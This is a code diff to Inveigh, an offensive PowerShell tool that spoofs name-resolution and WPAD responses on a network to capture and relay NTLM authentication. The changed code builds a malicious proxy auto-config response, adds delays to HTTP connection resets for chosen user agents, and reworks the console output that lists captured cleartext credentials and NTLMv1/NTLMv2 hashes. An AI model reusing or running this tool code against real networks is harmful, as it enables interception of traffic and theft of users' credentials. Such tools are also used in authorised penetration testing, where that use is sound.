$inveigh.status_queue.Add("mDNS Spoofer For Types $mDNSTypes_output = Enabled") > $null } + $inveigh.status_queue.Add("mDNS TTL = $mDNSTTL Seconds") > $null + $mDNS_response_message = "- response sent" + } else { @@ -997,7 +1007,7 @@ if($HTTP -eq 'Y' -or $HTTPS -eq 'Y') if($WPADAuthIgnore.Count -gt 0) { - $inveigh.status_queue.Add("WPAD NTLM Auth Ignored User Agents = " + ($WPADAuthIgnore -join ",")) > $null + $inveigh.status_queue.Add("WPAD NTLM Authentication Ignore List = " + ($WPADAuthIgnore -join ",")) > $null } } @@ -1033,34 +1043,53 @@ if($HTTP -eq 'Y' -or $HTTPS -eq 'Y') $inveigh.status_queue.Add("Basic Authentication Realm = $HTTPBasicRealm") > $null } - if($Proxy -eq 'Y') + $HTTPResetDelay = ($HTTPResetDelay | Where-Object {$_ -and $_.Trim()}) + + if($HTTPResetDelay.Count -gt 0) { - $inveigh.status_queue.Add("Proxy Capture = Enabled") > $null - $inveigh.status_queue.Add("Proxy Authentication = $ProxyAuth") > $null - $ProxyPortFailover = $ProxyPort + 1 - $ProxyIgnore = ($ProxyIgnore | Where-Object {$_ -and $_.Trim()}) + $inveigh.status_queue.Add("HTTP Reset Delay List = " + ($HTTPResetDelay -join ",")) > $null + $inveigh.status_queue.Add("HTTP Reset Delay Timeout = $HTTPResetDelayTimeout Seconds") > $null + } - if($ProxyIgnore.Count -gt 0) - { - $inveigh.status_queue.Add("Proxy Ignored User Agents = " + ($ProxyIgnore -join ",")) > $null - } + if($Proxy -eq 'Y') + { - if($ProxyIP -eq '0.0.0.0') + if($proxy_port_check) { - $proxy_WPAD_IP = $IP + $Proxy = "N" + $inveigh.status_queue.Add("Proxy Capture Disabled Due To In Use Port $ProxyPort") > $null } else { - $proxy_WPAD_IP = $ProxyIP - } + $inveigh.status_queue.Add("Proxy Capture = Enabled") > $null + $inveigh.status_queue.Add("Proxy Port = $ProxyPort") > $null + $inveigh.status_queue.Add("Proxy Authentication = $ProxyAuth") > $null + $ProxyPortFailover = $ProxyPort + 1 + $ProxyIgnore = ($ProxyIgnore | Where-Object {$_ -and $_.Trim()}) + + if($ProxyIgnore.Count -gt 0) + { + $inveigh.status_queue.Add("Proxy Ignore List = " + ($ProxyIgnore -join ",")) > $null + } + + if($ProxyIP -eq '0.0.0.0') + { + $proxy_WPAD_IP = $IP + } + else + { + $proxy_WPAD_IP = $ProxyIP + } + + if($WPADIP -and $WPADPort) + { + $WPADResponse = "function FindProxyForURL(url,host){$WPAD_direct_hosts_function return `"PROXY $proxy_WPAD_IP`:$ProxyPort; PROXY $WPADIP`:$WPADPort; DIRECT`";}" + } + else + { + $WPADResponse = "function FindProxyForURL(url,host){$WPAD_direct_hosts_function return `"PROXY $proxy_WPAD_IP`:$ProxyPort; PROXY $proxy_wpad_IP`:$ProxyPortFailover; DIRECT`";}" + } - if($WPADIP -and $WPADPort) - { - $WPADResponse = "function FindProxyForURL(url,host){$WPAD_direct_hosts_function return `"PROXY $proxy_WPAD_IP`:$ProxyPort; PROXY $WPADIP`:$WPADPort; DIRECT`";}" - } - else - { - $WPADResponse = "function FindProxyForURL(url,host){$WPAD_direct_hosts_function return `"PROXY $proxy_WPAD_IP`:$ProxyPort; PROXY $proxy_wpad_IP`:$ProxyPortFailover; DIRECT`";}" } } @@ -1231,29 +1260,37 @@ if($inveigh.status_output) while($inveigh.status_queue.Count -gt 0) { - if($inveigh.output_stream_only) - { - Write-Output($inveigh.status_queue[0] + $inveigh.newline) - $inveigh.status_queue.RemoveAt(0) - } - else + switch -Wildcard ($inveigh.status_queue[0]) { - switch -Wildcard ($inveigh.status_queue[0]) + {$_ -like "* Disabled Due To *" -or $_ -like "Run Stop-Inveigh to stop Inveigh" -or $_ -like "Windows Firewall = Enabled"} { - {$_ -like "* Disabled Due To *" -or $_ -like "Run Stop-Inveigh to stop Inveigh" -or $_ -like "Windows Firewall = Enabled"} + if($inveigh.output_stream_only) + { + Write-Output($inveigh.status_queue[0] + $inveigh.newline) + } + else { - Write-Warning ($inveigh.status_queue[0]) - $inveigh.status_queue.RemoveAt(0) + Write-Warning($inveigh.status_queue[0]) } - default + $inveigh.status_queue.RemoveAt(0) + } + + default + { + + if($inveigh.output_stream_only) + { + Write-Output($inveigh.status_queue[0] + $inveigh.newline) + } + else { - Write-Output ($inveigh.status_queue[0]) - $inveigh.status_queue.RemoveAt(0) + Write-Output($inveigh.status_queue[0]) } + $inveigh.status_queue.RemoveAt(0) } } @@ -1478,7 +1515,8 @@ $SMB_NTLM_functions_scriptblock = # HTTP Server ScriptBlock - HTTP/HTTPS/Proxy listener $HTTP_scriptblock = { - param ($Challenge,$HTTPAuth,$HTTPBasicRealm,$HTTPContentType,$HTTPIP,$HTTPPort,$HTTPDefaultEXE,$HTTPDefaultFile,$HTTPDir,$HTTPResponse,$HTTPS_listener,$NBNSBruteForcePause,$ProxyIgnore,$proxy_listener,$WPADAuth,$WPADAuthIgnore,$WPADResponse) + param ($Challenge,$HTTPAuth,$HTTPBasicRealm,$HTTPContentType,$HTTPIP,$HTTPPort,$HTTPDefaultEXE,$HTTPDefaultFile,$HTTPDir,$HTTPResetDelay,$HTTPResetDelayTimeout,$HTTPResponse, + $HTTPS_listener,$NBNSBruteForcePause,$Proxy,$ProxyIgnore,$proxy_listener,$WPADAuth,$WPADAuthIgnore,$WPADResponse) function NTLMChallengeBase64 { @@ -1630,7 +1668,7 @@ $HTTP_scriptblock = $HTTP_stream.AuthenticateAsServer($SSL_cert,$false,[System.Security.Authentication.SslProtocols]::Default,$false) } - [byte[]]$SSL_request_bytes = $null + [Byte[]]$SSL_request_bytes = $null do { @@ -1649,6 +1687,15 @@ $HTTP_scriptblock = $HTTP_stream = $HTTP_client.GetStream() } + if($HTTP_stream.DataAvailable) + { + $HTTP_data_available = $true + } + else + { + $HTTP_data_available = $false + } + while($HTTP_stream.DataAvailable) { $HTTP_stream.Read($TCP_request_bytes,0,$TCP_request_bytes.Length) @@ -1684,6 +1731,14 @@ $HTTP_scriptblock = $HTTP_header_user_agent_extract = $HTTP_header_user_agent_extract.Substring(0,$HTTP_header_user_agent_extract.IndexOf("-0D-0A-")) $HTTP_header_user_agent_extract = $HTTP_header_user_agent_extract.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} $HTTP_header_user_agent = New-Object System.String ($HTTP_header_user_agent_extract,0,$HTTP_header_user_agent_extract.Length) + + if($HTTPResetDelay.Count -gt 0 -and ($HTTPResetDelay | Where-Object {$HTTP_header_user_agent -match $_})) + { + $HTTP_reset_delay = $true + $HTTP_reset_delay_timeout = New-TimeSpan -Seconds $HTTPResetDelayTimeout + $HTTP_reset_delay_stopwatch = [System.Diagnostics.Stopwatch]::StartNew() + } + } if($HTTP_request_raw_URL_old -ne $HTTP_request_raw_URL -or $HTTP_client_handle_old -ne $HTTP_client.Client.Handle) @@ -1706,7 +1761,7 @@ $HTTP_scriptblock = $inveigh.log.Add("$(Get-Date -format 's') - $HTTP_type user agent $HTTP_header_user_agent received from $HTTP_source_IP") } - if($ProxyIgnore.Count -gt 0 -and ($ProxyIgnore | Where-Object {$HTTP_header_user_agent -match $_})) + if($Proxy -eq 'Y' -and $ProxyIgnore.Count -gt 0 -and ($ProxyIgnore | Where-Object {$HTTP_header_user_agent -match $_})) { $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type ignoring wpad.dat request due to user agent from $HTTP_source_IP") @@ -1723,7 +1778,7 @@ $HTTP_scriptblock = } } - + if($TCP_request -like "*-41-75-74-68-6F-72-69-7A-61-74-69-6F-6E-3A-20-*") { $HTTP_header_authorization_extract = $TCP_request.Substring($TCP_request.IndexOf("-41-75-74-68-6F-72-69-7A-61-74-69-6F-6E-3A-20-") + 46) @@ -1794,9 +1849,10 @@ $HTTP_scriptblock = $HTTP_POST_request_old = $HTTP_POST_request } - + if($HTTP_header_authorization.StartsWith('NTLM ')) { + $HTTP_header_authorization = $HTTP_header_authorization -replace 'NTLM ','' [Byte[]]$HTTP_request_bytes = [System.Convert]::FromBase64String($HTTP_header_authorization) @@ -2090,6 +2146,7 @@ $HTTP_scriptblock = if($HTTP_client_close) { + $HTTP_reset_delay = $false if($proxy_listener) { @@ -2105,8 +2162,18 @@ $HTTP_scriptblock = } else { - $HTTP_client.Close() - $HTTP_client_close = $true + + if($HTTP_data_available -or !$HTTP_reset_delay -or $HTTP_reset_delay_stopwatch.Elapsed -ge $HTTP_reset_delay_timeout) + { + $HTTP_client.Close() + $HTTP_client_close = $true + $HTTP_reset_delay = $false + } + else + { + Start-Sleep -m 100 + } + } } @@ -3710,7 +3777,7 @@ $control_scriptblock = if($inveigh.running) { Start-Sleep -S 1 - $inveigh.console_queue.Add("Inveigh exited at $(Get-Date -format 's')") + $inveigh.console_queue.Add("Inveigh exited due to $exit_message at $(Get-Date -format 's')") if($inveigh.file_output) { @@ -3785,10 +3852,6 @@ $control_scriptblock = StopInveigh "run count" } - $run_count_NTLMv1 = $RunCount + $inveigh.NTLMv1_list.Count - $run_count_NTLMv2 = $RunCount + $inveigh.NTLMv2_list.Count - $run_count_cleartext = $RunCount + $inveigh.cleartext_list.Count - } if($RunTime) @@ -3869,7 +3932,8 @@ function HTTPListener() $HTTP_powershell.AddScript($HTTP_scriptblock).AddArgument($Challenge).AddArgument($HTTPAuth).AddArgument( $HTTPBasicRealm).AddArgument($HTTPContentType).AddArgument($HTTPIP).AddArgument($HTTPPort).AddArgument( $HTTPDefaultEXE).AddArgument($HTTPDefaultFile).AddArgument($HTTPDir).AddArgument( - $HTTPResponse).AddArgument($HTTPS_listener).AddArgument($NBNSBruteForcePause).AddArgument( + $HTTPResetDelay).AddArgument($HTTPResetDelayTimeout).AddArgument($HTTPResponse).AddArgument( + $HTTPS_listener).AddArgument($NBNSBruteForcePause).AddArgument($Proxy).AddArgument( $ProxyIgnore).AddArgument($proxy_listener).AddArgument($WPADAuth).AddArgument( $WPADAuthIgnore).AddArgument($WPADResponse) > $null $HTTP_powershell.BeginInvoke() > $null @@ -3891,7 +3955,8 @@ function HTTPSListener() $HTTPS_powershell.AddScript($HTTP_scriptblock).AddArgument($Challenge).AddArgument($HTTPAuth).AddArgument( $HTTPBasicRealm).AddArgument($HTTPContentType).AddArgument($HTTPIP).AddArgument($HTTPSPort).AddArgument( $HTTPDefaultEXE).AddArgument($HTTPDefaultFile).AddArgument($HTTPDir).AddArgument( - $HTTPResponse).AddArgument($HTTPS_listener).AddArgument($NBNSBruteForcePause).AddArgument( + $HTTPResetDelay).AddArgument($HTTPResetDelayTimeout).AddArgument($HTTPResponse).AddArgument( + $HTTPS_listener).AddArgument($NBNSBruteForcePause).AddArgument($Proxy).AddArgument( $ProxyIgnore).AddArgument($proxy_listener).AddArgument($WPADAuth).AddArgument( $WPADAuthIgnore).AddArgument($WPADResponse) > $null $HTTPS_powershell.BeginInvoke() > $null @@ -3913,7 +3978,8 @@ function ProxyListener() $proxy_powershell.AddScript($HTTP_scriptblock).AddArgument($Challenge).AddArgument($HTTPAuth).AddArgument( $HTTPBasicRealm).AddArgument($HTTPContentType).AddArgument($ProxyIP).AddArgument($ProxyPort).AddArgument( $HTTPDefaultEXE).AddArgument($HTTPDefaultFile).AddArgument($HTTPDir).AddArgument( - $HTTPResponse).AddArgument($HTTPS_listener).AddArgument($NBNSBruteForcePause).AddArgument( + $HTTPResetDelay).AddArgument($HTTPResetDelayTimeout).AddArgument($HTTPResponse).AddArgument( + $HTTPS_listener).AddArgument($NBNSBruteForcePause).AddArgument($Proxy).AddArgument( $ProxyIgnore).AddArgument($proxy_listener).AddArgument($WPADAuth).AddArgument( $WPADAuthIgnore).AddArgument($WPADResponse) > $null $proxy_powershell.BeginInvoke() > $null @@ -4081,27 +4147,22 @@ if($ConsoleQueueLimit -ge 0 -or $inveigh.file_output -or $NBNSBruteForcePause -o } # Console Output Loop -if($inveigh.console_output) +try { - if($ConsoleStatus) - { - $console_status_timeout = New-TimeSpan -Minutes $ConsoleStatus - $console_status_stopwatch = [System.Diagnostics.Stopwatch]::StartNew() - } - - :console_loop while(($inveigh.running -and $inveigh.console_output) -or ($inveigh.console_queue.Count -gt 0 -and $inveigh.console_output)) + if($inveigh.console_output) { - while($inveigh.console_queue.Count -gt 0) - { + if($ConsoleStatus) + { + $console_status_timeout = New-TimeSpan -Minutes $ConsoleStatus + $console_status_stopwatch = [System.Diagnostics.Stopwatch]::StartNew() + } - if($inveigh.output_stream_only) - { - Write-Output($inveigh.console_queue[0] + $inveigh.newline) - $inveigh.console_queue.RemoveAt(0) - } - else + :console_loop while(($inveigh.running -and $inveigh.console_output) -or ($inveigh.console_queue.Count -gt 0 -and $inveigh.console_output)) + { + + while($inveigh.console_queue.Count -gt 0) { switch -wildcard ($inveigh.console_queue[0]) @@ -4109,7 +4170,16 @@ if($inveigh.console_output) {$_ -like "* written to *" -or $_ -like "* for relay *" -or $_ -like "*SMB relay *" -or $_ -like "* local administrator *"} { - Write-Warning ($inveigh.console_queue[0]) + + if($inveigh.output_stream_only) + { + Write-Output($inveigh.console_queue[0] + $inveigh.newline) + } + else + { + Write-Warning($inveigh.console_queue[0]) + } + $inveigh.console_queue.RemoveAt(0) } @@ -4118,7 +4188,16 @@ if($inveigh.console_output) if($ConsoleOutput -eq 'Y') { - Write-Output ($inveigh.console_queue[0]) + + if($inveigh.output_stream_only) + { + Write-Output($inveigh.console_queue[0] + $inveigh.newline) + } + else + { + Write-Output($inveigh.console_queue[0]) + } + } $inveigh.console_queue.RemoveAt(0) @@ -4130,7 +4209,16 @@ if($inveigh.console_output) if($ConsoleOutput -ne "Low") { - Write-Output ($inveigh.console_queue[0]) + + if($inveigh.output_stream_only) + { + Write-Output($inveigh.console_queue[0] + $inveigh.newline) + } + else + { + Write-Output($inveigh.console_queue[0]) + } + } $inveigh.console_queue.RemoveAt(0) @@ -4139,7 +4227,16 @@ if($inveigh.console_output) default { - Write-Output ($inveigh.console_queue[0]) + + if($inveigh.output_stream_only) + { + Write-Output($inveigh.console_queue[0] + $inveigh.newline) + } + else + { + Write-Output($inveigh.console_queue[0]) + } + $inveigh.console_queue.RemoveAt(0) } @@ -4147,132 +4244,141 @@ if($inveigh.console_output) } - } - - if($ConsoleStatus -and $console_status_stopwatch.Elapsed -ge $console_status_timeout) - { - - if($inveigh.cleartext_list.Count -gt 0) + if($ConsoleStatus -and $console_status_stopwatch.Elapsed -ge $console_status_timeout) { - Write-Output("$(Get-Date -format 's') - Current unique cleartext captures:" + $inveigh.newline) - $inveigh.cleartext_list.Sort() - - foreach($unique_cleartext in $inveigh.cleartext_list) + + if($inveigh.cleartext_list.Count -gt 0) { - if($unique_cleartext -ne $unique_cleartext_last) + Write-Output("$(Get-Date -format 's') - Current unique cleartext captures:" + $inveigh.newline) + $inveigh.cleartext_list.Sort() + + foreach($unique_cleartext in $inveigh.cleartext_list) { - Write-Output($unique_cleartext + $inveigh.newline) + if($unique_cleartext -ne $unique_cleartext_last) + { + Write-Output($unique_cleartext + $inveigh.newline) + } + + $unique_cleartext_last = $unique_cleartext } - $unique_cleartext_last = $unique_cleartext + Start-Sleep -m 5 + } + else + { + Write-Output("$(Get-Date -format 's') - No cleartext credentials have been captured" + $inveigh.newline) } - Start-Sleep -m 5 - } - else - { - Write-Output("$(Get-Date -format 's') - No cleartext credentials have been captured" + $inveigh.newline) - } - - if($inveigh.POST_request_list.Count -gt 0) - { - Write-Output("$(Get-Date -format 's') - Current unique POST request captures:" + $inveigh.newline) - $inveigh.POST_request_list.Sort() - - foreach($unique_POST_request in $inveigh.POST_request_list) + if($inveigh.POST_request_list.Count -gt 0) { - if($unique_POST_request -ne $unique_POST_request_last) + Write-Output("$(Get-Date -format 's') - Current unique POST request captures:" + $inveigh.newline) + $inveigh.POST_request_list.Sort() + + foreach($unique_POST_request in $inveigh.POST_request_list) { - Write-Output($unique_POST_request + $inveigh.newline) + if($unique_POST_request -ne $unique_POST_request_last) + { + Write-Output($unique_POST_request + $inveigh.newline) + } + + $unique_POST_request_last = $unique_POST_request } - $unique_POST_request_last = $unique_POST_request + Start-Sleep -m 5 } - - Start-Sleep -m 5 - } - if($inveigh.NTLMv1_list.Count -gt 0) - { - Write-Output("$(Get-Date -format 's') - Current unique NTLMv1 challenge/response captures:" + $inveigh.newline) - $inveigh.NTLMv1_list.Sort() - - foreach($unique_NTLMv1 in $inveigh.NTLMv1_list) + if($inveigh.NTLMv1_list.Count -gt 0) { - $unique_NTLMv1_account = $unique_NTLMv1.SubString(0,$unique_NTLMv1.IndexOf(":",($unique_NTLMv1.IndexOf(":") + 2))) + Write-Output("$(Get-Date -format 's') - Current unique NTLMv1 challenge/response captures:" + $inveigh.newline) + $inveigh.NTLMv1_list.Sort() - if($unique_NTLMv1_account -ne $unique_NTLMv1_account_last) + foreach($unique_NTLMv1 in $inveigh.NTLMv1_list) { - Write-Output($unique_NTLMv1 + $inveigh.newline) + $unique_NTLMv1_account = $unique_NTLMv1.SubString(0,$unique_NTLMv1.IndexOf(":",($unique_NTLMv1.IndexOf(":") + 2))) + + if($unique_NTLMv1_account -ne $unique_NTLMv1_account_last) + { + Write-Output($unique_NTLMv1 + $inveigh.newline) + } + + $unique_NTLMv1_account_last = $unique_NTLMv1_account } - $unique_NTLMv1_account_last = $unique_NTLMv1_account - } + $unique_NTLMv1_account_last = '' + Start-Sleep -m 5 + Write-Output("$(Get-Date -format 's') - Current NTLMv1 IP addresses and usernames:" + $inveigh.newline) - $unique_NTLMv1_account_last = '' - Start-Sleep -m 5 - Write-Output("$(Get-Date -format 's') - Current NTLMv1 IP addresses and usernames:" + $inveigh.newline) + foreach($NTLMv1_username in $inveigh.NTLMv1_username_list) + { + Write-Output($NTLMv1_username + $inveigh.newline) + } - foreach($NTLMv1_username in $inveigh.NTLMv1_username_list) + Start-Sleep -m 5 + } + else { - Write-Output($NTLMv1_username + $inveigh.newline) + Write-Output("$(Get-Date -format 's') - No NTLMv1 challenge/response hashes have been captured" + $inveigh.newline) } - Start-Sleep -m 5 - } - else - { - Write-Output("$(Get-Date -format 's') - No NTLMv1 challenge/response hashes have been captured" + $inveigh.newline) - } - - if($inveigh.NTLMv2_list.Count -gt 0) - { - Write-Output("$(Get-Date -format 's') - Current unique NTLMv2 challenge/response captures:" + $inveigh.newline) - $inveigh.NTLMv2_list.Sort() - - foreach($unique_NTLMv2 in $inveigh.NTLMv2_list) + if($inveigh.NTLMv2_list.Count -gt 0) { - $unique_NTLMv2_account = $unique_NTLMv2.SubString(0,$unique_NTLMv2.IndexOf(":",($unique_NTLMv2.IndexOf(":") + 2))) + Write-Output("$(Get-Date -format 's') - Current unique NTLMv2 challenge/response captures:" + $inveigh.newline) + $inveigh.NTLMv2_list.Sort() - if($unique_NTLMv2_account -ne $unique_NTLMv2_account_last) + foreach($unique_NTLMv2 in $inveigh.NTLMv2_list) { - Write-Output($unique_NTLMv2 + $inveigh.newline) - } + $unique_NTLMv2_account = $unique_NTLMv2.SubString(0,$unique_NTLMv2.IndexOf(":",($unique_NTLMv2.IndexOf(":") + 2))) - $unique_NTLMv2_account_last = $unique_NTLMv2_account - } + if($unique_NTLMv2_account -ne $unique_NTLMv2_account_last) + { + Write-Output($unique_NTLMv2 + $inveigh.newline) + } - $unique_NTLMv2_account_last = '' - Start-Sleep -m 5 - Write-Output("$(Get-Date -format 's') - Current NTLMv2 IP addresses and usernames:" + $inveigh.newline) + $unique_NTLMv2_account_last = $unique_NTLMv2_account + } - foreach($NTLMv2_username in $inveigh.NTLMv2_username_list) + $unique_NTLMv2_account_last = '' + Start-Sleep -m 5 + Write-Output("$(Get-Date -format 's') - Current NTLMv2 IP addresses and usernames:" + $inveigh.newline) + + foreach($NTLMv2_username in $inveigh.NTLMv2_username_list) + { + Write-Output($NTLMv2_username + $inveigh.newline) + } + + } + else { - Write-Output($NTLMv2_username + $inveigh.newline) + Write-Output("$(Get-Date -format 's') - No NTLMv2 challenge/response hashes have been captured" + $inveigh.newline) } - + + $console_status_stopwatch = [System.Diagnostics.Stopwatch]::StartNew() + } - else + + if($inveigh.console_input) { - Write-Output("$(Get-Date -format 's') - No NTLMv2 challenge/response hashes have been captured" + $inveigh.newline) - } - $console_status_stopwatch = [System.Diagnostics.Stopwatch]::StartNew() + if([Console]::KeyAvailable) + { + $inveigh.console_output = $false + BREAK console_loop + } + + } + Start-Sleep -m 5 } - if($inveigh.console_input) - { + } - if([Console]::KeyAvailable) - { - $inveigh.console_output = $false - BREAK console_loop - } - - } +} +finally +{ - Start-Sleep -m 5 + if($Tool -eq 2) + { + $inveigh.running = $false } } @@ -4593,51 +4699,51 @@ if($inveigh.tool -ne 1) :console_loop while((($inveigh.running -or $inveigh.relay_running) -and $inveigh.console_output) -or ($inveigh.console_queue.Count -gt 0 -and $inveigh.console_output)) { - while($inveigh.console_queue.Count -gt 0) - { - - switch -wildcard ($inveigh.console_queue[0]) + while($inveigh.console_queue.Count -gt 0) { - {$_ -like "* written to *" -or $_ -like "* for relay *" -or $_ -like "*SMB relay *" -or $_ -like "* local administrator *"} - { - Write-Warning $inveigh.console_queue[0] - $inveigh.console_queue.RemoveAt(0) - } - - {$_ -like "* spoofer is disabled" -or $_ -like "* local request" -or $_ -like "* host header *" -or $_ -like "* user agent received *"} + switch -wildcard ($inveigh.console_queue[0]) { - if($ConsoleOutput -eq 'Y') + {$_ -like "* written to *" -or $_ -like "* for relay *" -or $_ -like "*SMB relay *" -or $_ -like "* local administrator *"} { - Write-Output $inveigh.console_queue[0] + Write-Warning $inveigh.console_queue[0] + $inveigh.console_queue.RemoveAt(0) } - $inveigh.console_queue.RemoveAt(0) + {$_ -like "* spoofer is disabled" -or $_ -like "* local request" -or $_ -like "* host header *" -or $_ -like "* user agent received *"} + { - } + if($ConsoleOutput -eq 'Y') + { + Write-Output $inveigh.console_queue[0] + } - {$_ -like "* response sent" -or $_ -like "* ignoring *" -or $_ -like "* HTTP*request for *" -or $_ -like "* Proxy request for *"} - { + $inveigh.console_queue.RemoveAt(0) + + } + + {$_ -like "* response sent" -or $_ -like "* ignoring *" -or $_ -like "* HTTP*request for *" -or $_ -like "* Proxy request for *"} + { - if($ConsoleOutput -ne "Low") + if($ConsoleOutput -ne "Low") + { + Write-Output $inveigh.console_queue[0] + } + + $inveigh.console_queue.RemoveAt(0) + + } + + default { Write-Output $inveigh.console_queue[0] + $inveigh.console_queue.RemoveAt(0) } - $inveigh.console_queue.RemoveAt(0) - } - default - { - Write-Output $inveigh.console_queue[0] - $inveigh.console_queue.RemoveAt(0) - } - - } - - } + } if([Console]::KeyAvailable) { |